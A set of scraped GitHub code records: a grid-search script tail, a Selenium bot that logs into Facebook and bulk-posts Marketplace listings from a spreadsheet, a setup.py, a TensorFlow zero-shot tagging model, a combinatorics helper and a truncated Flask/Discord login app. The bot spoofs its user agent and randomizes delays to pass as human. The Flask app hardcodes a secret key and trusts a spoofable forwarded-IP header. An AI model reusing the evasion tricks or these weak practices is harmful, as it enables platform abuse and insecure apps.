min(retvals)\n\n\ndef main(args=None):\n args = parse_parameters()\n fh = open(args.params)\n param_string = fh.read()\n fh.close()\n hyperparameters = optimizer_base.parse_hyperparameter_string(param_string)\n grid = optimizer_base.build_grid(hyperparameters)\n if args.algorithm:\n raise NotImplementedError()\n elif args.cli_target:\n cli_function = optimizer_base.command_line_function()\n fn = functools.partial(cli_function, args.cli_target)\n #print perform_gridsearch(fn, grid)\n perform_gridsearch(fn, grid)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"liamcli/pyMetaLearn","sub_path":"pyMetaLearn/optimizers/gridsearch/gridsearch/gridsearch.py","file_name":"gridsearch.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"9032669363","text":"import time\nimport random\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nimport sys\nimport json\nfrom openpyxl import load_workbook\n\n\ndef sleep_time():\n time.sleep(random.uniform(5, 10))\n\n\nclass BotFacebookMarketplace:\n def __init__(self, excel, email, password):\n self.excel = excel\n self.email = email\n self.password = password\n\n opts = Options()\n opts.add_argument(\n \"user-agent=Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/71.0.3578.80 Chrome/71.0.3578.80 Safari/537.36\")\n\n if sys.platform == \"win32\":\n self.driver = webdriver.Chrome('./chromedriver.exe', options=opts)\n else:\n self.driver = webdriver.Chrome('./chromedriver', options=opts)\n self.driver.maximize_window()\n\n self.get_access_facebook()\n sleep_time()\n self.iterate_excel()\n\n def change_page(self, url):\n self.driver.get(url)\n sleep_time()\n\n def get_access_facebook(self):\n self.change_page(\"https://www.facebook.com\")\n email_input = WebDriverWait(self.driver, 5).until(EC.presence_of_element_located((By.ID, \"email\")))\n email_input.send_keys(self.email)\n sleep_time()\n password_input = WebDriverWait(self.driver, 5).until(EC.presence_of_element_located((By.ID, \"pass\")))\n password_input.send_keys(self.password)\n sleep_time()\n login_button = WebDriverWait(self.driver, 5).until(\n EC.element_to_be_clickable((By.XPATH, \"//*[@type='submit']\")))\n login_button.click()\n\n def select_category(self, category):\n with open('./data/category.json', encoding=\"utf8\") as r:\n data = json.loads(r.read())\n data_category = data[int(category)]\n category_label = data_category['category']\n\n try:\n category_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//label[@aria-label='Categoría']\")))\n category_input.click()\n sleep_time()\n category_option = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, f\"//*[text() ='{category_label}']/ancestor::div[@role='button']\")))\n category_option.click()\n sleep_time()\n except TimeoutException:\n category_input = WebDriverWait(self.driver, random.uniform(7, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//label[@aria-label='Categoría']\")))\n category_input.click()\n sleep_time()\n category_option = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, f\"//*[text() ='{category_label}']/ancestor::div[@role='button']\")))\n category_option.click()\n sleep_time()\n\n def send_text_data(self, title, price, description, sku):\n title_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//label[@aria-label='Título']/div/div/input\")))\n title_input.send_keys(title)\n\n sleep_time()\n\n price_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//label[@aria-label='Precio']/div/div/input\")))\n price_input.send_keys(price)\n\n sleep_time()\n\n description_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//label[@aria-label='Descripción']/div/div/textarea\")))\n description_input.send_keys(description.replace(\"\\r\\n\", \"\\n\"))\n\n sleep_time()\n\n sku_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//label[@aria-label='SKU']/div/div/input\")))\n sku_input.send_keys(sku)\n\n sleep_time()\n\n def select_state(self):\n state_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//label[@aria-label='Estado']\")))\n state_input.click()\n sleep_time()\n state_option = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, f\"//*[text() ='Nuevo']/ancestor::div[@role='option']\")))\n state_option.click()\n sleep_time()\n\n def select_ubication(self, ubication):\n ubication_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//input[@aria-label='Ingresa una ciudad']\")))\n ubication_input.clear()\n\n ubication_input.send_keys(ubication)\n\n sleep_time()\n\n ubication_option = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//ul[@role='listbox']/li[1]\")))\n ubication_option.click()\n sleep_time()\n\n def upload_images(self, text_images):\n images_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//input[@accept='image/*,image/heif,image/heic']\")))\n images_input.send_keys(text_images)\n sleep_time()\n\n def iterate_excel(self):\n wb = load_workbook(self.excel)\n ws = wb.active\n\n counter = 0\n success = 0\n\n for rows in ws.iter_rows(min_row=2, min_col=1):\n counter += 1\n\n try:\n sku = rows[0].value if rows[0].value else ''\n category = str(rows[1].value)\n title = rows[2].value\n description = rows[3].value\n price_detail = str(rows[4].value)\n image1 = rows[5].value\n image2 = rows[6].value\n image3 = rows[7].value\n image4 = rows[8].value\n image5 = rows[9].value\n image6 = rows[10].value\n region_detail = str(rows[11].value)\n comuna_detail = str(rows[12].value)\n images = (image2, image3, image4, image5, image6)\n except Exception as e:\n print(e)\n sku, category, title, description, price_detail, image1, image2, image3 = None, None, None, None, None, None, None, None\n image4, image5, image6, region_detail, comuna_detail, images = None, None, None, None, None, None\n if image1:\n text_images = image1\n for image in images:\n if image:\n text_images = text_images + ' \\n ' + image\n\n else:\n text_images = ''\n\n if category and title and description and price_detail and region_detail and comuna_detail:\n self.change_page(\"https://www.facebook.com/marketplace/create/item\")\n\n # ---------------------------- SELECT CATEGORY --------------------------------\n self.select_category(category)\n\n # ---------------------------- TITLE - DESCRIPTION - PRICE ----------------------------\n self.send_text_data(title, price_detail, description, sku)\n\n # ---------------------------- REGION - COMUNA ----------------------------\n self.select_ubication(f\"{region_detail}, {comuna_detail}\")\n\n # ---------------------------- IMAGES ----------------------------\n self.upload_images(text_images)\n sleep_time()\n\n self.select_state()\n\n # ---------------------------- NEXT BUTTON ----------------------------\n next_button = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//div[@aria-label='Siguiente']\")))\n next_button.click()\n\n sleep_time()\n\n post_button = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.element_to_be_clickable(\n (By.XPATH, \"//div[@aria-label='Publicar']\")))\n post_button.click()\n sleep_time()\n\n self.driver.quit()\n return counter, success\n","repo_name":"Jose-Miguel7/PRY-20220808-RQT-PUBLICADOR-FACEBOOK","sub_path":"publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":8551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31887705605","text":"#!/usr/bin/env python\nimport sys\nfrom setuptools import setup, find_packages\nfrom setuptools.command.test import test as test_command\nfrom metadata import (\n __name__,\n __version__,\n __long_description__,\n __description__,\n __author__,\n __author_email__,\n)\n\n\nclass PyTest(test_command):\n user_options = [(\"pytest-args=\", \"a\", \"Arguments to pass to py.test\")]\n\n def initialize_options(self):\n test_command.initialize_options(self)\n self.pytest_args = []\n\n def finalize_options(self):\n test_command.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n # import here, cause outside the eggs aren't loaded\n import pytest\n\n # import re\n # if(type(self.pytest_args) == 'str'):\n # args = filter(lambda x: len(x) > 0, re.split(r'\\s+', self.pytest_args))\n # else:\n # args = self.pytest_args\n errno = pytest.main(self.pytest_args)\n sys.exit(errno)\n\n\nsetup(\n name=__name__,\n packages=find_packages(),\n version=__version__,\n description=__description__,\n long_description=__long_description__,\n author=__author__,\n author_email=__author_email__,\n include_package_data=True,\n url=\"\",\n install_requires=[\"paramiko==2.7.1\", \"requests==2.22.0\",\"pyfiglet==0.8.post1\"],\n setup_requires=[\"pytest-runner\"],\n tests_require=[\"pytest\", \"mock\", \"PyHamcrest\", \"pytest-runner\"],\n cmdclass={\"test\": PyTest},\n)\n","repo_name":"secxena/credcheck","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"66"} +{"seq_id":"41338463630","text":"import numpy as np\nimport tensorflow as tf\n\nfrom attalos.imgtxt_algorithms.approaches.base import AttalosModel\nfrom attalos.util.transformers.onehot import OneHot\nfrom attalos.imgtxt_algorithms.correlation.correlation import construct_W\nfrom attalos.imgtxt_algorithms.util.negsamp import NegativeSampler\n\nimport attalos.util.log.log as l\nlogger = l.getLogger(__name__)\n\nclass FastZeroTagModel(AttalosModel):\n \"\"\"\n Create a tensorflow graph that finds the principal direction of the target word embeddings \n (with negative sampling), using the loss function from \"Fast Zero-Shot Image Tagging\".\n \"\"\"\n def __init__(self, wv_model, datasets, **kwargs):\n self.wv_model = wv_model\n self.one_hot = OneHot(datasets, valid_vocab=wv_model.vocab)\n word_counts = NegativeSampler.get_wordcount_from_datasets(datasets, self.one_hot)\n self.fast_sample = kwargs.get(\"fast_sample\", False)\n self.negsampler = NegativeSampler(word_counts, self.fast_sample)\n self.w = construct_W(wv_model, self.one_hot.get_key_ordering()).T\n self.learning_rate = kwargs.get(\"learning_rate\", 0.0001)\n self.optim_words = kwargs.get(\"optim_words\", True)\n self.hidden_units = kwargs.get(\"hidden_units\", \"200\")\n self.use_batch_norm = kwargs.get(\"use_batch_norm\",False)\n self.opt_type = kwargs.get(\"opt_type\",\"adam\")\n if self.hidden_units=='0': \n self.hidden_units=[]\n else:\n self.hidden_units = [int(x) for x in self.hidden_units.split(',')]\n self.model_info = dict()\n # Placeholders for data\n self.model_info['input'] = tf.placeholder(shape=(None, datasets[0].img_feat_size), dtype=tf.float32)\n self.model_info[\"pos_vecs\"] = tf.placeholder(dtype=tf.float32)\n self.model_info[\"neg_vecs\"] = tf.placeholder(dtype=tf.float32)\n\n # Construct fully connected layers\n layer = self.model_info['input']\n layers = []\n for i, hidden_size in enumerate(self.hidden_units):\n layer = tf.contrib.layers.relu(layer, hidden_size)\n layers.append(layer)\n if self.use_batch_norm:\n layer = tf.contrib.layers.batch_norm(layer)\n layers.append(layer)\n logger.info(\"Using batch normalization\")\n\n\n # Output layer should always be linear\n layer = tf.contrib.layers.linear(layer, self.w.shape[1])\n layers.append(layer)\n\n self.model_info['layers'] = layers\n self.model_info['prediction'] = layer\n\n \n def fztloss( f, pVecs, nVecs ):\n \"\"\"\n Tensorized cost function from Fast Zero-Shot Learning paper\n\n Args:\n f: The output from the network, a tensor of shape (# images, word embedding size)\n pVecs: The vector embeddings of the ground truth tags, a tensor\n of shape (# images, # positive tags, word embedding size)\n nVecs: The vector embeddings of negatively sampled tags, a tensor\n of shape (# images, # negative samples, word embedding size)\n\n Returns:\n Scalar tensor representing the batch cost\n \"\"\"\n posmul = tf.mul(pVecs, f)\n negmul = tf.mul(nVecs, f)\n\n tfpos = tf.reduce_sum(posmul, reduction_indices=2)\n tfneg = tf.reduce_sum(negmul, reduction_indices=2)\n\n tfpos = tf.transpose(tfpos, [1,0])\n tfneg = tf.transpose(tfneg, [1,0])\n\n negexpan = tf.tile( tf.expand_dims(tfneg, -1), [1, 1, tf.shape(tfpos)[1]] )\n posexpan = tf.tile( tf.transpose(tf.expand_dims(tfpos, -1), [0,2,1]), [1, tf.shape(tfneg)[1], 1])\n differences = tf.sub(negexpan, posexpan) \n\n return tf.reduce_sum(tf.reduce_sum(tf.log(1 + tf.exp(differences)), reduction_indices=[1,2]))\n\n loss = fztloss(self.model_info['prediction'], self.model_info['pos_vecs'], self.model_info['neg_vecs'])\n \n self.model_info['loss'] = loss\n if self.opt_type=='sgd':\n optimizer=tf.train.GradientDescent\n else:\n optimizer=tf.train.AdamOptimizer\n self.model_info['optimizer'] = optimizer(learning_rate=self.learning_rate).minimize(loss)\n self.test_one_hot = None\n super(FastZeroTagModel, self).__init__() \n\n\n def predict_feats(self, sess, x):\n return sess.run(self.model_info['prediction'], feed_dict={self.model_info['input']: x})\n\n def _get_ids(self, tag_ids, numSamps=[5, 10], uniform_sampling=False):\n \"\"\"\n Takes a batch worth of text tags and returns positive/negative ids\n \"\"\"\n pos_word_ids = np.ones((len(tag_ids), numSamps[0]), dtype=np.int32)\n pos_word_ids.fill(-1)\n for ind, tags in enumerate(tag_ids):\n if len(tags) > 0:\n pos_word_ids[ind] = np.random.choice(tags, size=numSamps[0])\n \n neg_word_ids = None\n if uniform_sampling:\n neg_word_ids = np.random.randint(0, \n self.one_hot.vocab_size, \n size=(len(tag_ids), numSamps[1]))\n else:\n neg_word_ids = np.ones((len(tag_ids), numSamps[1]), dtype=np.int32)\n neg_word_ids.fill(-1)\n for ind in range(pos_word_ids.shape[0]):\n # TODO: Check to see if this benefits from the same bug as negsampling code\n neg_word_ids[ind] = self.negsampler.negsamp_ind(pos_word_ids[ind], \n numSamps[1])\n \n return pos_word_ids, neg_word_ids\n\n def prep_fit(self, data):\n img_feats, text_feats_list = data\n\n text_feat_ids = []\n for tags in text_feats_list:\n text_feat_ids.append([self.one_hot.get_index(tag) for tag in tags if tag in self.one_hot])\n\n pos_ids, neg_ids = self._get_ids(text_feat_ids)\n \n pvecs = np.zeros((pos_ids.shape[0], pos_ids.shape[1], self.w.shape[1]))\n nvecs = np.zeros((neg_ids.shape[0], neg_ids.shape[1], self.w.shape[1]))\n for i, ids in enumerate(pos_ids):\n pvecs[i] = self.w[ids]\n for i, ids in enumerate(neg_ids):\n nvecs[i] = self.w[ids]\n pvecs = pvecs.transpose((1, 0, 2))\n nvecs = nvecs.transpose((1, 0, 2))\n \n fetches = [self.model_info[\"optimizer\"], self.model_info[\"loss\"]]\n feed_dict = {\n self.model_info[\"input\"]: img_feats,\n self.model_info[\"pos_vecs\"]: pvecs,\n self.model_info[\"neg_vecs\"]: nvecs\n }\n\n return fetches, feed_dict\n \n def prep_predict(self, dataset, cross_eval=False):\n if self.test_one_hot is None or self.test_dataset is dataset:\n self.test_dataset = dataset\n self.test_one_hot = OneHot([dataset], valid_vocab=self.wv_model.vocab)\n self.test_w = construct_W(self.wv_model, self.test_one_hot.get_key_ordering()).T\n \n\n x = []\n y = []\n for idx in dataset:\n image_feats, text_feats = dataset.get_index(idx)\n text_feats = self.test_one_hot.get_multiple(text_feats)\n x.append(image_feats)\n y.append(text_feats)\n x = np.asarray(x)\n y = np.asarray(y)\n\n fetches = [self.model_info[\"prediction\"], ]\n feed_dict = {\n self.model_info[\"input\"]: x\n }\n truth = y\n return fetches, feed_dict, truth\n\n def post_predict(self, predict_fetches, cross_eval=False):\n predictions = predict_fetches[0]\n if cross_eval and self.test_w is None:\n raise Exception(\"test_w is not set. Did you call prep_predict?\")\n predictions = np.dot(predictions, self.test_w.T)\n return predictions\n def get_training_loss(self, fit_fetches):\n return fit_fetches[1]\n","repo_name":"Lab41/attalos","sub_path":"attalos/imgtxt_algorithms/approaches/fast0tag.py","file_name":"fast0tag.py","file_ext":"py","file_size_in_byte":7994,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"66"} +{"seq_id":"5063870193","text":"# ------------------------------------------------------------------------------\n# 組み合わせ(Compination, nCr)\n# ------------------------------------------------------------------------------\n# 解説\n# - 組み合わせの総数を出力。\n# \n# リンク\n# - \n# \n# 計算量\n# - O(log(r))以下程度(概算)\n# - https://qiita.com/ageprocpp/items/f6661deaa09dda124132\n# \n# verify\n# - https://atcoder.jp/contests/abc185/tasks/abc185_c\n# - https://atcoder.jp/contests/abc034/tasks/abc034_c\n# ------------------------------------------------------------------------------\n# 階乗の逆元の前処理をしてMODとる場合は->次のCombunationクラスへ\ndef cmb(n: int, r: int, mod: int= 1):\n if n - r < r: r = n - r\n if r == 0: return 1\n if r == 1: return n\n\n numerator = [n - r + k + 1 for k in range(r)]\n denominator = [k + 1 for k in range(r)]\n for p in range(2, r + 1): # p番目について、\n pivot = denominator[p - 1] # pivotで約分を試みる。\n if pivot > 1: # ただし、pivotが1、すなわちすでに割り尽くされているならp番目は飛ばす。\n offset = (n - r) % p\n for k in range(p - 1, r, p): # p番目を約分できるということはp番目からpの倍数番目も約分可能なので実施する。\n numerator[k - offset] //= pivot\n denominator[k] //= pivot\n\n result = 1\n for k in range(r):\n if numerator[k] > 1:\n result *= int(numerator[k])\n result %= mod\n return result\n\n\n# Udage\nprint(cmb(10, 2)) # = 10C2 = 10 * 9 // 2 * 1\n\"-> 45\"\n\n# ------------------------------------------------------------------------------\n# 組み合わせ(Compination, nCr)\n# ------------------------------------------------------------------------------\n# 解説\n# - mod下のnCr算出。\n# - 特に複数回nCrを算出する問題で有用。\n#\n# リンク\n# - \n# \n# 計算量\n# - O(factorial_max)\n# \n# verify\n# - https://atcoder.jp/contests/abc132/tasks/abc132_d\n# ------------------------------------------------------------------------------\nclass Combination():\n def __init__(self, factorial_max: int, mod: int) -> None:\n \"\"\"\n factorial_max = 7.3 * 10 ** 5 : Python limit (>2sec)\n factorial_max = 10 ** 6 : PyPy limit (=260 ~ 280msec)\n \n O(factorial_max)\n \"\"\"\n self.fac = [1, 1] # fac : 階乗(1!,2!,3!,...)\n self.factorial_max = factorial_max + 1\n self.finv = [1, 1] # inv : 逆元(1,1/2,...1/N) -> inv[i] = pow(i, MOD - 2, MOD) # フェルマーの小定理より\n self.inv = [0, 1] # finv: 階乗の逆元(1/1!, 1/2!, 1/3!...)\n self.mod = mod\n self._build()\n\n def _build(self):\n for i in range(2, self.factorial_max):\n self.fac.append(self.fac[i - 1] * i % self.mod)\n self.inv.append(self.mod - self.inv[self.mod % i] * (self.mod // i) % self.mod)\n self.finv.append(self.finv[i - 1] * self.inv[i] % self.mod)\n\n def nCr(self, n: int, r: int):\n \"\"\"\n O(1)\n \"\"\"\n if n < r: return 0\n if n < 0 or r < 0: return 0\n return self.fac[n] * (self.finv[r] * self.finv[n - r] % self.mod) % self.mod\n \n def nHr(self, n: int, r: int):\n print(\"[注意] factorial_maxはn + rまで必要!!!\")\n \"\"\"\n ◯◯◯◯|◯◯|◯ ← これ系の問題。\n * n : 仕切り版の数 + 1\n * r : 分配する物(◯)自体の数\n \n * 区別のない r 個の物を n グループに分配する。\n eg.) 5個のボールを2個の箱に分配する分け方 : 2H5\n * n 種類の物から重複を許して r 個選択する。\n eg.) 3種類の果物から4個選ぶ取り方 : 3H4\n \n O(1)\n \"\"\"\n print(\"**** factorial_maxの最大値としてn + rが必要となる! ****\")\n return self.nCr(n - 1 + r, r)\n\n\n# Usage\nMOD = 10 ** 9 + 7\ncomb = Combination(5000, MOD)\n# 特に複数回nCrを計算する場面で有用。\nprint([comb.nCr(10, i) for i in range(10)]) # [1, 10, 45, 120, 210, 252, 210, 120, 45, 10]\n ","repo_name":"K53/atcoder-workspace","sub_path":"lib/Combination.py","file_name":"Combination.py","file_ext":"py","file_size_in_byte":4221,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7157852276","text":"from flask import Flask, redirect, url_for, render_template, request\r\nfrom flask_discord import DiscordOAuth2Session\r\nfrom video_handler import *\r\nfrom config import *\r\nimport requests\r\n\r\napp = Flask(__name__)\r\nvh = VideoHandler()\r\n\r\nif FLASK_ENVIRONMENT == 'dev':\r\n app.secret_key = b\"DEV_ENV\"\r\n app.config[\"DISCORD_REDIRECT_URI\"] = \"http://localhost:5000/callback\"\r\nelse:\r\n app.secret_key = FLASK_SECRET_KEY\r\n app.config[\"DISCORD_REDIRECT_URI\"] = DISCORD_REDIRECT_URI\r\n\r\napp.config[\"DISCORD_CLIENT_ID\"] = DISCORD_CLIENT_ID\r\napp.config[\"DISCORD_CLIENT_SECRET\"] = DISCORD_CLIENT_SECRET\r\n\r\ndef getUserIP():\r\n if request.environ.get('HTTP_X_FORWARDED_FOR') is None:\r\n return request.environ['REMOTE_ADDR']\r\n else:\r\n return request.environ['HTTP_X_FORWARDED_FOR'] # if behind a proxy\r\n\r\ndef isLoggedIn():\r\n # noinspection PyBroadException\r\n try:\r\n user = discord.fetch_user()\r\n except:\r\n user = None\r\n\r\n return user\r\n\r\ndef userIsInSneakerbotics():\r\n guilds = discord.fetch_guilds()\r\n\r\n for guild in guilds:\r\n if guild.id == 642900909793345536:\r\n return True\r\n\r\ndiscord = DiscordOAuth2Session(app)\r\n\r\n@app.route(\"/login/\")\r\ndef login():\r\n return discord.create_session()\r\n\r\n@app.route(\"/logout/\")\r\ndef logout():\r\n discord.revoke()\r\n\r\n return redirect(url_for(\".index\"))\r\n\r\n@app.route(\"/callback/\")\r\ndef callback():\r\n discord.callback()\r\n return redirect(url_for(\".index\"))\r\n\r\n@app.route(\"/admin/\")\r\ndef admin():\r\n user = isLoggedIn()\r\n\r\n if not user:\r\n return \"Not a user\"\r\n\r\n elif user.id == int(ADMIN):\r\n return render_template('admin.html', user=user)\r\n\r\n else:\r\n return \"Not an admin: \" + str(user.id)\r\n\r\n@app.route(\"/watch/